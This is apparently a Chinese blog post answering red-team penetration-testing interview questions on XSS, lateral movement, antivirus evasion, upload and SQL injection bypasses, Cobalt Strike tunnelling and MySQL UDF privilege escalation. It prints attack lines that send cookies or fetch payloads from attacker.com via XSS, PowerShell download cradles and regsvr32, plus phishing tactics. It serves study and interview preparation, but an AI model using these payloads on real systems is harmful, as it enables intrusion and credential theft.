当前位置: 首页 > news >正文

2025年渗透测试面试题总结-渗透测试红队面试九(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

渗透测试红队面试九

一、XSS 设置 HTTP-Only 如何绕过

二、XSS 攻击手段分类

三、全杀软环境渗透策略

四、内网横向工具与协议

五、Fscan 崩溃处理方案

六、Apache/IIS 解析漏洞

七、PHP 文件上传绕过方式

八、工作组横向权限需求

九、域控查找方法

十、CDN 获取真实 IP

十一、判断邮箱类型

十二、验证真实 IP

十三、不出网机器上线 CS(Cobalt Strike)

十四、代理工具与杀软对抗

十五、免杀技术核心方法

十六、SQL 注入 Bypass 技术

十七、红队 HW 信息收集方式

十八、Whois 收集信息

十九、登录框利用方式

二十、Python/PHP 开发用途

二十一、代码审计思路

二十二、MySQL Getshell 前提

二十三、MySQL.ini 配置参数

二十四、Redis SSRF 内网攻击

二十五、UDF 提权步骤

二十六、安全学习资源推荐

渗透测试红队面试九

二百四十一、xss 设置http-only如何绕过二百四十二、xss攻击手段有哪些二百四十三、遇到全是杀软的工作组怎么办二百四十四、使用什么工具内网横向二百四十五、fscan扫机器崩了怎么办二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上传绕过方式(黑、白名单、解析漏洞)二百四十八、工作组横向需要用户什么权限二百四十九、如何查找域控(尽可能多的方式)二百五十、如何从cdn 真实ip二百五十一、如何判断邮箱类型二百五十二、如何确定你拿到的就是真实ip二百五十三、机器不出网如何上线到cs(不出网的机器是拿到wenshell的机器)二百五十四、走代理用哪些工具,遇到杀软怎么办二百五十五、如何免杀二百五十六、sql注入bypass有哪些(尽可能多说)二百五十七、平常红队hw信息收集方式有哪些二百五十八、whois 收集的信息包括哪些二百五十九、给一个登录框能想到哪些利用方式二百六十、平常开发经常用python 和php做什么二百六十一、代码审计的思路是什么二百六十二、mysql getshell的前提是什么二百六十三、其中需要mysql.ini 配置参数应该是怎样二百六十四、redis ssf 如何攻击内网,可以用到哪些协议二百六十五、说一下udf提权二百六十六、平常经常在哪些地方学习

一、XSS 设置 HTTP-Only 如何绕过

  1. 非 Cookie 窃取路径
    • 直接请求伪造:利用 XSS 构造请求发送敏感数据(如 <img src="http://attacker.com?token=localStorage.getItem('auth')"> )。
    • DOM 数据提取:读取页面隐藏字段(如 <script>exfil(document.forms[0].password.value)</script> )。
  2. 客户端存储劫持
    • LocalStorage/SessionStorage:通过 JS 遍历存储并外传(需应用存储敏感数据)。
    • IndexedDB 导出:恶意脚本读取数据库内容(如用户历史记录)。
  3. 界面钓鱼攻击
    • 伪造登录弹窗诱导用户输入账号密码,劫持后发送至攻击者服务器。

二、XSS 攻击手段分类

类型攻击场景示例
反射型 XSSURL 参数未过滤,即时触发http://victim.com?search=<script>alert(1)</script>
存储型 XSS恶意脚本持久化存储(如论坛评论)留言板插入 <img src=x onerror=stealCookie()>
DOM 型 XSS前端渲染漏洞,无需服务端交互eval(decodeURIComponent(location.hash))
盲打 XSS攻击后台管理界面(如日志面板)插入 <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
mXSS富文本编辑器过滤逻辑绕过<a href="javascript:alert(1)">Click</a>

三、全杀软环境渗透策略

  1. 无文件攻击
    • PowerShell 内存加载
      powershellIEX (New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1') 
    • WMI 持久化:通过 WMI 事件订阅执行 payload(如 __EventFilter + CommandLineEventConsumer)。
  2. 白名单工具滥用
    • MsBuild 执行 C#:将恶意代码编译为临时程序集:
      xml<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Target Name="Exec"> <Exec Command="calc.exe" /> </Target> </Project>
    • Regsvr32 加载远程脚本
      cmregsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll 
  3. 流量隐匿技术
    • 域前置(Domain Fronting):伪装流量至合法 CDN(如 Google 或 Cloudflare)。
    • HTTP/3 QUIC 协议:利用 UDP 特性规避传统 IDS 检测。

四、内网横向工具与协议

工具功能典型命令
ImpacketSMB/WMI/LDAP 协议攻击psexec.py user:password@192.168.1.1
CrackMapExec自动化凭证喷射与横向移动cme smb 192.168.1.0/24 -u user -p password
Chisel多协议隧道穿透chisel server -p 8080 + chisel client attacker.com:8080 R:445:127.0.0.1:445
Proxychains代理链流量路由proxychains nmap -sT 10.10.10.1
ResponderLLMNR/NBT-NS 毒化responder -I eth0 -wrf

五、Fscan 崩溃处理方案

  1. 资源优化
    • 分段扫描:拆分 IP 段为 /24 子网(fscan -h 192.168.1.1-255)。
    • 线程控制:限制并发数为 50(-t 50)。
  2. 兼容性调整
    • 协议过滤:禁用非常用协议(-noping -nobr)。
    • 日志分析:启用 -debug 模式定位崩溃点(如特定协议解析错误)。
  3. 替代方案
    • 切换至 RustScan(高性能端口扫描):
      bashrustscan -a 192.168.1.1/24 -- -sV -sC 

六、Apache/IIS 解析漏洞

  1. Apache 漏洞
    • 多后缀解析.php.jpg 被解析为 PHP(需错误配置 AddHandler)。
    • .htaccess 覆盖:上传文件指定解析规则:
      apacheAddType application/x-httpd-php .jpg 
  2. IIS 漏洞
    • 目录解析/upload/test.asp/logo.jpg 被当作 ASP 执行(IIS 6.0)。
    • 分号截断file.asp;.jpg 被解析为 ASP(IIS 7.5 以下)。

七、PHP 文件上传绕过方式

  1. 黑名单绕过
    • 特殊后缀.phtml, .php7, .phar
    • 双写绕过.pphphp → 过滤后变为 .php
  2. 白名单+解析漏洞
    • MIME 类型伪造:修改 Content-Type: image/jpeg
    • 文件头伪造:添加合法文件头(如 GIF89a)。
  3. 服务器配置漏洞
    • 路径拼接截断filename="test.php .jpg"(空格截断)。
    • 空字节截断(PHP<5.3):test.php%00.jpg → 保存为 test.php

八、工作组横向权限需求

  1. 管理员权限:用于 PsExec、WMI 远程执行命令。
  2. 本地用户凭证:Pass-the-Hash 攻击(需 NTLM 哈希)。
  3. 文件共享写入权:上传后门至共享目录(如 \\192.168.1.1\C$\temp\shell.exe )。

九、域控查找方法

  1. DNS 查询
    bashnslookup -type=SRV _ldap._tcp.dc._msdcs.example.com 
  2. 命令探测
    cmdnet group "Domain Controllers" /domain 
  3. LDAP 查询:通过端口 389 搜索 (objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192)

十、CDN 获取真实 IP

  1. 历史 DNS 记录:使用 SecurityTrailsDNSDumpster 查询域名解析历史。
  2. 子域名探测mail.example.com 可能未使用 CDN。
  3. SSL 证书匹配:通过 Censys 搜索相同证书的 IP。
  4. 邮件服务器追踪:触发密码重置邮件,检查邮件头中的 Received 字段。

十一、判断邮箱类型

  1. MX 记录查询
    bashdig mx example.com 
    • Exchange:MX 指向 outlook.com 或自建服务器。
    • Google Workspace:MX 记录包含 google.com
  2. Webmail 特征
    • Exchange:登录页 URL 包含 /owa
    • 腾讯企业邮:mail.example.com 跳转至 exmail.qq.com

十二、验证真实 IP

  1. 全球 Ping 测试:使用 Ping.pe 检测多地响应 IP 是否一致。
  2. 端口扫描:真实 IP 可能开放非标准端口(如 22, 3389)。
  3. HTTP 头对比:比较 CDN 与真实 IP 的 ServerX-Powered-By 头差异。

十三、不出网机器上线 CS(Cobalt Strike)

  1. 反向代理隧道

    • 工具:reGeorg、Neo-reGeorg
      bash# 上传 tunnel.jsp 至目标服务器 python neoreg.py generate -k password # 生成隧道脚本 python neoreg.py -k password -u http://victim.com/tunnel.jsp 
    • 流量路由:通过隧道代理将本地端口映射到目标内网。
  2. 协议封装穿透

    • ICMP 隧道:使用 ptunnel-ng 将 TCP 流量封装为 ICMP 包。
    • DNS 隧道:通过 dnscat2 实现隐蔽通信:
      bashdnscat2 --dns server=attacker.com,port=53 --secret=key
  3. 中间人跳板

    • 利用已控主机作为代理(如通过 socks4a 协议转发流量)。

十四、代理工具与杀软对抗

工具功能杀软绕过策略
Proxifier全局流量代理白名单模式加载合法应用(如 Chrome)
SSHuttleVPN over SSH加密流量混淆(如 AES-256-GCM)
Tor匿名网络路由桥接节点(obfs4 混淆)
Nginx反向代理伪装配置合法域名与 TLS 证书

十五、免杀技术核心方法

  1. 代码混淆

    • 字符串加密:使用 AES 加密敏感函数名。
    • 控制流平坦化:打乱代码逻辑(如 LLVM-Obfuscator)。
  2. 内存加载

    • 反射型 DLL 注入:通过 LoadLibraryA 加载加密 payload。
    • Process Hollowing:替换合法进程内存(如 svchost.exe )。
  3. 反沙箱检测

    • 硬件指纹检查:检测 CPU 核心数、内存大小(沙箱通常配置低)。
    • 延迟执行:休眠 10 分钟后触发 payload。

十六、SQL 注入 Bypass 技术

过滤类型绕过方法示例 Payload
关键字过滤内联注释 /*!50000select*/UNION/*!50000SELECT*/ 1,2,3
空格过滤使用括号或换行符 %0aSELECT'1'%0aFROM
引号过滤十六进制编码 0xHEXWHERE user=0x61646D696E
WAF 规则分块传输编码(Chunked HTTP)将 payload 拆分为多个 chunk 发送
盲注优化布尔盲注基于时间差 IF(1,SLEEP(5),0)' OR IF(1,SLEEP(5),0)-- -

十七、红队 HW 信息收集方式

  1. 被动收集

    • 证书透明度:查询 crt.sh 获取子域名。
    • GitHub 监控:搜索敏感关键词(如 password, api_key)。
  2. 主动扫描

    • 资产测绘:使用 FOFA 搜索 title="企业后台"
    • 端口服务:Masscan 快速扫描全网段开放端口。
  3. 社会工程

    • 钓鱼邮件:伪造 HR 通知诱导点击恶意链接。
    • 电话钓鱼:伪装 IT 部门要求提供 VPN 凭据。

十八、Whois 收集信息

  1. 基础信息

    • 域名注册商、注册日期、过期时间。
    • 管理员姓名、邮箱(如 admin@example.com )。
  2. 网络信息

    • DNS 服务器地址(如 ns1.cloudflare.com )。
    • IP 地址段归属(如 ASN 号码)。
  3. 关联分析

    • 同一注册人关联的其他域名。

十九、登录框利用方式

  1. 漏洞利用

    • SQL 注入:admin'-- 绕过密码验证。
    • 弱口令爆破:Top 1000 密码字典攻击。
  2. 逻辑漏洞

    • 密码重置功能绕过(如修改 userid 参数)。
    • 验证码未校验(重放攻击)。
  3. 前端攻击

    • 修改 JS 代码禁用客户端验证。

二十、Python/PHP 开发用途

语言典型场景工具/框架
Python渗透测试脚本(如爬虫、漏洞扫描)Scrapy、Requests、SQLMap API
PHPWeb 后门(如一句话木马)Laravel(伪装正常业务逻辑)

二十一、代码审计思路

  1. 入口点分析
    • 用户输入点:$_GET, $_POST, 文件上传。
  2. 危险函数追踪
    • PHP:system(), eval(), include()
    • Java:Runtime.exec(), JNDI lookup
  3. 数据流追踪
    • 从输入点到敏感操作(如数据库查询、文件写入)。

二十二、MySQL Getshell 前提

  1. 权限要求
    • FILE 权限(GRANT FILE ON *.* TO 'user'@'%')。
  2. 写文件路径
    • 确定可写目录(通过 @@secure_file_priv)。
  3. Web 目录已知
    • 上传 WebShell 至可通过 URL 访问的路径。

二十三、MySQL.ini 配置参数

ini[mysqld] secure_file_priv = "" # 允许导出到任意目录 local_infile = ON # 允许加载本地文件

二十四、Redis SSRF 内网攻击

  1. 协议利用

    • HTTP:探测内网 Web 服务(redis-cli -h 内网IP -p 80)。
    • Gopher:构造攻击包攻击内网服务(如 FastCGI RCE)。
  2. 工具自动化

    • SSRFmap:自动化探测与利用内网漏洞。

二十五、UDF 提权步骤

  1. 上传共享库
    • 编译恶意 .so.dll 文件(如 lib_mysqludf_sys.so )。
  2. 创建函数
    sqlCREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; 
  3. 执行命令
    sqlSELECT sys_eval('whoami');

二十六、安全学习资源推荐

  1. 平台
    • 漏洞库:CVE Details、Exploit-DB。
    • 社区:Reddit r/netsec、先知社区。
  2. 实践平台
    • Hack The Box、TryHackMe。
  3. 文献
    • 《内网安全攻防:渗透测试实战指南》(2024版)。

相关文章:

  • Milvus(21):过滤搜索、范围搜索、分组搜索
  • 【2025最新】Pycharm里如何运行多个py文件
  • Python基础学习-Day23
  • 撤回不了一点 v1.0.2,支持微信QQ钉钉飞书等消息防撤回
  • yolo11n-obb训练rknn模型
  • 博客系统技术需求文档(基于 Flask)
  • ArcGIS、InVEST与RUSLE在水土流失模拟及分析中的实践技术
  • 使用docker安装clickhouse集群
  • K230 ISP:一种新的白平衡标定方法
  • 0.66kV0.69kV接地电阻柜常规配置单
  • Data.olllo:一个可以打开 100GB CSV 文件的桌面工具
  • JavaScript-02
  • 2025.5.13总结
  • PYTHON训练营DAY24
  • 佰力博科技与您探讨表面电阻的测试方法及应用领域
  • 中国品牌日 | 以科技创新为引领,激光院“风采”品牌建设结硕果
  • 微服务,服务粒度多少合适
  • 最优化方法Python计算:有约束优化应用——线性可分问题支持向量机
  • 影刀RPA开发-采集爬取京东读书书籍
  • 【redis】缓存策略
  • 专访|茸主:杀回UFC,只为给自己一个交代
  • 法治课|争议中的“行人安全距离”于法无据,考量“注意义务”才更合理
  • 睡觉总做梦是睡眠质量差?梦到这些事,才要小心
  • 印称印巴军事行动总指挥同意将局势降级
  • 国产水陆两栖大飞机AG600批产首架机完成总装下线
  • 刘国中:持续加强护士队伍建设,更好保障人民身体健康